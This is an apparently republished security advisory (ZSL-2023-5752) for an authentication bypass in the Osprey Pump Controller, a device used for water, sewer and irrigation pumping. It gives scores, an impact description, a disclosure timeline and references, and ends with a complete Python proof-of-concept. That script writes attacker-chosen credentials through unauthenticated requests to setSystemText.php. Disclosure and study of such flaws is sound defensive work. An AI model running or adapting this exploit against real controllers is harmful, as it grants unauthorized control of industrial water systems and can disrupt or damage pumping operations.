9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
54.3%
Title: Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification
Advisory ID: ZSL-2023-5752
Type: Local/Remote
Impact: Privilege Escalation, Security Bypass, Manipulation of Data, System Access, DoS
Risk: (5/5)
Release Date: 27.02.2023
Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller.
Technology hasn’t changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer.
ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities.
We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters.
User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens.
Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access.
A vulnerability has been discovered in the web panel of Osprey pump controller that allows an unauthenticated attacker to create an account and bypass authentication, thereby gaining unauthorized access to the system. The vulnerability stems from a lack of proper authentication checks during the account creation process, which allows an attacker to create a user account without providing valid credentials. An attacker who successfully exploits this vulnerability can gain access to the pump controller’s web panel, and cause disruption in operation, modify data, change other usernames and passwords, or even shut down the controller entirely.
The attacker can leverage their unauthorized access to the system to carry out a variety of malicious activities, including: Modifying pump settings, such as flow rates or pressure levels, causing damage or loss of control, stealing sensitive data, such as system logs or customer information, changing passwords and other user credentials, potentially locking out legitimate users or allowing the attacker to maintain persistent access to the system, disabling or shutting down the controller entirely, potentially causing significant disruption to operations and service delivery.
ProPump and Controls, Inc. - <https://www.propumpservice.com> | <https://www.pumpstationparts.com>
Software Build ID 20211018, Production 10/18/2021
Mirage App: MirageAppManager, Release [1.0.1]
Mirage Model 1, RetroBoard II
Apache/2.4.25 (Raspbian)
Raspbian GNU/Linux 9 (stretch)
GNU/Linux 4.14.79-v7+ (armv7l)
Python 2.7.13 [GCC 6.3.0 20170516]
GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git
PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)
[05.01.2023] Vulnerabilities discovered.
[07.01.2023] Vendor contacted.
[09.01.2023] No response from the vendor.
[10.01.2023] Vendor contacted.
[10.01.2023] CISA contacted through CVD.
[10.01.2023] Submitted to VINCE.
[12.01.2023] CISA/VINCE asked for more details.
[13.01.2023] Provided PoCs to CISA.
[13.01.2023] Provided PoCs to VINCE and discovered XSS in VINCE.
[26.01.2023] No response from VINCE.
[26.01.2023] CISA closes incident: INC000010422052. NCISS Score: Baseline - Negligible (White). A Baseline–Negligible priority incident is an incident that is highly unlikely to affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence. No further actions required by CISA.
[26.02.2023] No response from the vendor.
[27.02.2023] Public security advisory released.
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <https://www.cisa.gov/news-events/news/cisa-national-cyber-incident-scoring-system-nciss>
[2] <https://packetstormsecurity.com/files/171185/>
[3] <https://vulners.com/cve/CVE-2023-28398>
[4] <https://nvd.nist.gov/vuln/detail/CVE-2023-28398>
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-082-06>
[6] <https://www.securityweek.com/unpatched-security-flaws-expose-water-pump-controllers-to-remote-hacker-attacks/>
[7] <https://www.hackread.com/cisa-vulnerability-propump-osprey-pump-controller/>
[8] <https://www.isssource.com/multiple-vulnerabilities-in-osprey-pump-controller/>
[9] <https://www.csirtcv.gva.es/sci-multiples-vulnerabilidades-en-controladores-de-bomba-osprey-de-propump/>
[10] <https://nki.gov.hu/it-biztonsag/hirek/vizugyi-rendszereket-erinto-kritikus-serulekenysegekre-figyelmeztet-a-cisa/>
[11] <https://www.linkedin.com/pulse/water-pump-controllers-vulnerable-remote-hacker-due-christian/>
[12] <https://vulners.com/cve/CVE-2023-27712>
[27.02.2023] - Initial release
[23.03.2023] - Added reference [2], [3], [4] and [5]
[30.03.2023] - Added reference [6]
[10.04.2023] - Added reference [7], [8], [9], [10] and [11]
[29.04.2023] - Added reference [12]
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python
#
#
# Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification
#
#
# Vendor: ProPump and Controls, Inc.
# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com
# Affected version: Software Build ID 20211018, Production 10/18/2021
# Mirage App: MirageAppManager, Release [1.0.1]
# Mirage Model 1, RetroBoard II
#
#
# Summary: Providing pumping systems and automated controls for
# golf courses and turf irrigation, municipal water and sewer,
# biogas, agricultural, and industrial markets. Osprey: door-mounted,
# irrigation and landscape pump controller.
#
# Technology hasn't changed dramatically on pump and electric motors
# in the last 30 years. Pump station controls are a different story.
# More than ever before, customers expect the smooth and efficient
# operation of VFD control. Communications—monitoring, remote control,
# and interfacing with irrigation computer programs—have become common
# requirements. Fast and reliable accessibility through cell phones
# has been a game changer.
#
# ProPump & Controls can handle any of your retrofit needs, from upgrading
# an older relay logic system to a powerful modern PLC controller, to
# converting your fixed speed or first generation VFD control system to
# the latest control platform with communications capabilities.
#
# We use a variety of solutions, from MCI-Flowtronex and Watertronics
# package panels to sophisticated SCADA systems capable of controlling
# and monitoring networks of hundreds of pump stations, valves, tanks,
# deep wells, or remote flow meters.
#
# User friendly system navigation allows quick and easy access to all
# critical pump station information with no password protection unless
# requested by the customer. Easy to understand control terminology allows
# any qualified pump technician the ability to make basic changes without
# support. Similar control and navigation platform compared to one of the
# most recognized golf pump station control systems for the last twenty
# years make it familiar to established golf service groups nationwide.
# Reliable push button navigation and LCD information screen allows the
# use of all existing control panel door switches to eliminate the common
# problems associated with touchscreens.
#
# Global system configuration possibilities allow it to be adapted to
# virtually any PLC or relay logic controlled pump stations being used in
# the industrial, municipal, agricultural and golf markets that operate
# variable or fixed speed. On board Wi-Fi and available cellular modem
# option allows complete remote access.
#
# Desc: A vulnerability has been discovered in the web panel of Osprey pump
# controller that allows an unauthenticated attacker to create an account
# and bypass authentication, thereby gaining unauthorized access to the
# system. The vulnerability stems from a lack of proper authentication
# checks during the account creation process, which allows an attacker
# to create a user account without providing valid credentials. An attacker
# who successfully exploits this vulnerability can gain access to the pump
# controller's web panel, and cause disruption in operation, modify data,
# change other usernames and passwords, or even shut down the controller
# entirely.
#
# The attacker can leverage their unauthorized access to the
# system to carry out a variety of malicious activities, including:
# Modifying pump settings, such as flow rates or pressure levels, causing
# damage or loss of control, stealing sensitive data, such as system logs
# or customer information, changing passwords and other user credentials,
# potentially locking out legitimate users or allowing the attacker to
# maintain persistent access to the system, disabling or shutting down
# the controller entirely, potentially causing significant disruption to
# operations and service delivery.
#
# ----------------------------------------------------------------------
# $ ./accpump.py 192.168.0.25 root rewt
# [ ok ]
# [ ok ]
# Login with 'root:rewt' -> Register Access Menu.
# ----------------------------------------------------------------------
#
# Tested on: Apache/2.4.25 (Raspbian)
# Raspbian GNU/Linux 9 (stretch)
# GNU/Linux 4.14.79-v7+ (armv7l)
# Python 2.7.13 [GCC 6.3.0 20170516]
# GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git
# PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5752
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php
#
#
# 05.01.2023
#
import requests
import sys as s
if len(s.argv)!=4:
print("Osprey Pump Controller Bypass Exploit")
print("Arguments: [host] [username] [password]")
exit(-3)
else:
url=s.argv[1]
usr=s.argv[2]
pwd=s.argv[3]
if not "http" in url:
url="http://{}".format(url)
#
# Data names . Values
#
# USERNAME0 . user
# USERNAME1 .
# USERNAME2 .
# USERNAME3 .
# USERNAME4 .
# USERPW0 . 1234
# USERPW1 .
# USERPW2 .
# USERPW3 .
# USERPW4 .
#
url+="/"
url+="setSystemText"
url+=".php"
paru={"sysTextValue" :usr,
"sysTextName" :"USERNAME3",
"backTargetLinkNumber":75,
"userName" :"ZSL"}
parp={"sysTextValue" :pwd,
"sysTextName" :"USERPW3",
"backTargetLinkNumber":75,
"userName" :"WriteExploit"}
r=requests.get(url,params=paru)
if 'System String "USERNAME3" set' in r.text:
print("[ ok ]")
else:
print(f"Error: {r.status_code} {r.reason} - {r.text}")
r=requests.get(url,params=parp)
if 'System String "USERPW3" set' in r.text:
print("[ ok ]")
print(f"Login with '{usr}:{pwd}' ",end="")
print("-> Register Access Menu.")
else:
print(f"Error: {r.status_code} {r.reason} - {r.text}")
</p></body></html>
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
54.3%